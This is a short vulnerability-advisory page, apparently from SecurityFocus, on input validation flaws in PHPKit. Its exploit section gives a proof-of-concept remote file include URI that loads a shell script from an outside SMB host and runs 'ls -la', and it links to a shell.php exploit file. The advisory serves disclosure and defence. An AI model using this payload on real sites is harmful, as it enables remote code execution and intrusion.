• info
• discussion
• exploit
• solution
• references

PHPKit Multiple Input Validation Vulnerabilities



No exploit is required.

The following proof of concept is available for the remote file include issue:

http://www.securityfocus.com/data/vulnerabilities/exploits/shell.php

Use with the following example URI:

http://www.example.com/[path]/include.php?cmd=ls%20-la&path=\\192.168.1.2\c\shell.php

• /data/vulnerabilities/exploits/shell.php